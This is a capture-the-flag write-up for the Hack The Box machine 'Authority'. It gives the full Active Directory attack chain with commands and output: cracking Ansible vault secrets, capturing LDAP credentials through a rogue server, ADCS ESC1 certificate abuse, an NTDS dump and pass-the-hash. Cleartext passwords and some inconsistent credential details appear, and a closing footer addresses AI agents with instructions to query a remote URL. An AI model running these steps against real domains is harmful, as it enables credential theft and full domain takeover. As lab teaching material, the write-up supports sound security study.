# HTB - Authority
## Description
***
Authority is a medium-difficulty Windows machine that highlights the dangers of misconfigurations, password reuse, storing credentials on shares, and demonstrates how default settings in Active Directory (such as the ability for all domain users to add up to 10 computers to the domain) can be combined with other issues (vulnerable AD CS certificate templates) to take over a domain.
## Enumeration
***
**Nmap Scan**
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
8443/tcp open https-alt
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nmap -p53,80,88,135,139,389,445,8443 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Active Directory LDAP (Domain: authority.htb)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2024-11-09T16:43:18+00:00; +4h00m00s from scanner time.
445/tcp open microsoft-ds?
636/tcp open ldapssl
8443/tcp open ssl/https-alt
..snip..
Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-time:
| date: 2024-11-09T16:43:10
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
```
**Summary**
```R
* Open ports: 53,80,88,135,139,389,445,8443
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - RPC - SMB - KERBEROS - LDAP
* Important notes: Domain: authority.htb
```
**hosts file**
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $sudo sh -c "echo '$ip AUTHORITY authority.htb AUTHORITY.authority.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $tail -n1 /etc/hosts
10.10.11.222 AUTHORITY authority.htb AUTHORITY.authority.htb
```
After discovering open ports and updating `/etc/hosts` file, I will move to enumerate the services running one by one.
**HTTP Enumeration**
Visiting `http://authority.htb/` shows me normal IIS webpage
When I tried to fuzz the website, I didn't get anything for both directories and files, So I will move to webapp at `8443` port
When I visit the site at `http://authority.htb:8443/`, It tells me it needs TLS, So I will try access it using `https`
When I visit the same URL but with `https`, I'm redirected to `https://authority.htb:8443/pwm/private/login`
> This message states that the `Webapp` is in `Configuration mode` which allows updating the configuration without LDAP authentication
There are also two buttons here and both of them leading to the same page
I can see LDAP distinguished name here with username of `svc_pwm` and DC of `htb.corp`
When I tried to authenticate with `*:*` (for ldap injection testing), I get this error that reveals another username `svc_ldap`. Also, I get the same error using any other credentials
From here, I can't do many things, So I will move to other services (SMB, Kerberos, ..etc)
**Kerberos Enumeration**
Unluckily, this user can't be `asrepoasted`
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $impacket-GetNPUsers authority.htb/svc_ldap@10.10.11.222 -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for svc_ldap@10.10.11.222
[-] User svc_ldap@10.10.11.222 doesn't have UF_DONT_REQUIRE_PREAUTH set
```
**SMB & RPC Enumeration**
No data from RPC
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c enumdomgroups
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
```
Here I can see I have `READ` access on `Development` share
There are several files in this share but with no use and I can see `ADCS` folder, So It might be indicator to PKI existence
```bash
nxc smb authority -u 'guest' -p '' -M spider_plus
cat /tmp/nxc_hosted/nxc_spider_plus/10.10.11.222.json
..snip..
{
"Development": {
"Automation/Ansible/ADCS/.ansible-lint": {
"atime_epoch": "2023-03-17 09:20:48",
"ctime_epoch": "2023-03-17 09:20:48",
"mtime_epoch": "2023-03-17 09:37:52",
"size": "259 B"
},
"Automation/Ansible/ADCS/.yamllint": {
"atime_epoch": "2023-03-17 09:20:48",
"ctime_epoch": "2023-03-17 09:20:48",
"mtime_epoch": "2023-03-17 09:37:52",
"size": "205 B"
},
"Automation/Ansible/ADCS/LICENSE": {
"atime_epoch": "2023-03-17 09:20:48",
"ctime_epoch": "2023-03-17 09:20:48",
"mtime_epoch": "2023-03-17 09:37:52",
"size": "11.1 KB"
},
"Automation/Ansible/ADCS/README.md": {
"atime_epoch": "2023-03-17 09:20:48",
"ctime_epoch": "2023-03-17 09:20:48",
"mtime_epoch": "2023-03-17 09:37:52",
"size": "7.11 KB"
..snip..
```
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $impacket-smbclient authority.htb/guest@10.10.11.222
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
$ shares
ADMIN$
C$
Department Shares
Development
IPC$
NETLOGON
SYSVOL
```
I found several files containing passwords not non of them worked
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $cat ansible_inventory
ansible_user: administrator
ansible_password: Welcome1
ansible_port: 5985
ansible_connection: winrm
ansible_winrm_transport: ntlm
ansible_winrm_server_cert_validation: ignore
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $cat tomcat-users.xml.j2
..snip..
```
Under `PWN/defaults/`, there is file containing ansible secrets
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ cat pwn/defaults/main.yml
..snip..
ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764
```
I run the command and it asked for a password, So I supplied `Welcome1` (found before) as a password but it gave me this error
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible-vault decrypt main.yml
Vault password:
ERROR! input is not vault encrypted data. /home/kali/HackTheBox/platform/machines/Authority/main.yml is not a vault encrypted file for /home/kali/HackTheBox/platform/machines/Authority/main.yml
```
I released I made something wrong which is I should get the hashes of these secrets and crack them to get the correct password
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $cat main.yml
$ANSIBLE_VAULT;1.1;AES256
326665343864353665376531366637316331386162643232303835663339663466623131613262396134353663663462373265633832356663356239383039640a346431373431666433343434366139356536343763336662346134663965343430306561653964643235643733346162626134393430336334326263326364380a6530343137333266393234336261303438346635383264396362323065313438
$ANSIBLE_VAULT;1.1;AES256
313563383439633230633734353632613235633932356333653561346162616664333932633737363335616263326464633832376261306131303337653964350a363663623132353136346631396662386564323238303933393362313736373035356136366465616536373866346138623166383535303930356637306461350a3164666630373030376537613235653433386539346465336633653630356531
$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764
```
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible2john secret1 > secret1.hash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible2john secret2 > secret2.hash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible2john secret3 > secret3.hash
```
Modify the output hashes to match this format:
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $cat ansible.hashes
$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647c3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8
$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed22809393b1767055a66deae678f4a8b1f8550905f70da5
$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73ad5d8804b4b2511c3b15814ebcf2fe98334284203635
```
## Foothold
***
Crack with hashcat using `auto-detect` hash mode gives me the same password for all the three hashes
```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ hashcat hashes.txt /usr/share/wordlists/rockyou.txt
$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed228809393b1767055a66deae678f4a8b1f8550905f70da5:!@#$%^&*
$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647cc3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8:!@#$%^&*
$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73aad5d8804b4b2511c3b15814ebcf2fe98334284203635:!@#$%^&*
Session..........: hashcat
Status...........: Cracked
```
I followed this post to decrypt the secrets:
{% embed url="" %}
first I need to install `ansbile` package to use `ansible-vault` command
```bash
sudo apt install ansible
```
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $echo '$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764' | ansible-vault decrypt --vault-password-file=vault.txt
Decryption successful
DevT3st@123
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $echo '$ANSIBLE_VAULT;1.1;AES256
326665343864353665376531366637316331386162643232303835663339663466623131613262396134353663663462373265633832356663356239383039640a346431373431666433343434366139356536343763336662346134663965343430306561653964643235643733346162626134393430336334326263326364380a6530343137333266393234336261303438346635383264396362323065313438' | ansible-vault decrypt --vault-password-file=vault.txt
Decryption successful
svc_pwm
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $echo '$ANSIBLE_VAULT;1.1;AES256
313563383439633230633734353632613235633932356333653561346162616664333932633737363335616263326464633832376261306131303337653964350a363663623132353136346631396662386564323238303933393362313736373035356136366465616536373866346138623166383535303930356637306461350a3164666630373030376537613235653433386539346465336633653630356531' | ansible-vault decrypt --vault-password-file=vault.txt
Decryption successful
pWm_@dm!N_!23
```
I tried several combination of usernames and passwords. This one only worked
I checked for lab access and get access denied
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nxc smb authority -u svc_pwn -p 'pWm_@dm!N_!23' --shares
SMB 10.10.11.222 445 AUTHORITY [+] authority.htb\svc_pwn:pWm_@dm!N_!23
SMB 10.10.11.222 445 AUTHORITY [-] Error enumerating shares: STATUS_ACCESS_DENIED
```
## Lateral Movement
***
I released that it's dead end because `svc_pwn` can't authenticate to ldap, either. I will try the credential to the webapp on `8443` port.
The password worked on `Configuraiton Manager` tab only not the main login-form
Under `Confgiuration Editor`, there is `Connection` tab that has several field and I can see that `svc_ldap` user's credentials is stored on the server and connect to `ldaps://authority.authority.htb:636`, So If I change this value to my host's IP, I can get the credentials.
And then click on `Test LDAP Profile`
```R
svc_ldap:htblDaP_1n_th3_cle4r!
```
Now I have valid domain account, access to `winRM` and know that ADCS exists.
```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $evil-winrm -i authority -u svc_ldap -p 'lDaP_1n_th3_cle4r!'
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> type user.txt
394683251efed7605f3dfa7c20d37ad1
```
> User Flag: 394683251efed7605f3dfa7c20d37ad1
## Privilege Escalation
***
Since ADCS exists, I will check for vulnerable templates with `Certipy`
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy find -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -vulnerable -stdout
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
..snip..
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
..snip..
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
```
Domain Computers can abuse ESC1 to get `domain admins` privileges by specifing "subject alternative name" to privileged user in the domain (Administrator) and I can create one if the `machine account qoute` is not set to Zero.
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nxc ldap authority -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -M maq
LDAPS 10.10.11.222 636 AUTHORITY [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r!
MAQ 10.10.11.222 389 AUTHORITY [*] Getting the MachineAccountQuota
MAQ 10.10.11.222 389 AUTHORITY MachineAccountQuota: 10
```
The value is 10, So I can add new Computer account
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $impacket-addcomputer authority.htb/svc_ldap@authority.authority.htb -computer-name 'blind0bandit$' -computer-pass 'blind0bandit@@!!!@@' -dc-host authority.authority.htb -k
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[-] CCache file is not found. Skipping...
[*] Successfully added machine account blind0bandit$ with password blind0bandit@@!!!@@.
```
Request Certificate as Administrator
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy req -u 'blind0bandit$@authority.htb' -p 'blind0bandit@@!!!@@' -ca AUTHORITY-CA -template CorpVPN -upn administrator@authority.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.222
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
```
> I get `KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)` that means PKINIT authentication is not implemented, but fortunately `Certipy` has `-ldap-shell option`
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.222 -ldap-shell
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Connecting to 'ldaps://10.10.11.222:636'
[*] Authenticated to '10.10.11.222' as: u:HTB\Administrator
Type help for list of commands
# change_password 'authority$'
Got User DN: CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
Attempting to set new password of: X!xJ#)>|HFPi";;
Password changed successfully!
```
> I changed the password of the dc machine account to instead of administrator to minimize the damage
Dump ntds secrets to get administrator hash
```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nxc smb 10.10.11.222 -u 'authority$' -p 'X!xJ#)>|HFPi";;' --ntds --user administrator
SMB 10.10.11.222 445 AUTHORITY Administrator:500:aad3b435b51404eeaad3b435b51404ee:6961f422924da90a6928xxxxxxxxxxx:::
```
Access the machine now :))
```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $evil-winrm -i authority -u administrator -H 6961f422924da90a6928xxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
1c920b7d7e0303262573017ecc5e09d0
```
> Root Flag: 1c920b7d7e0303262573017ecc5e09d0
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/windows-machines/medium/htb-authority.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.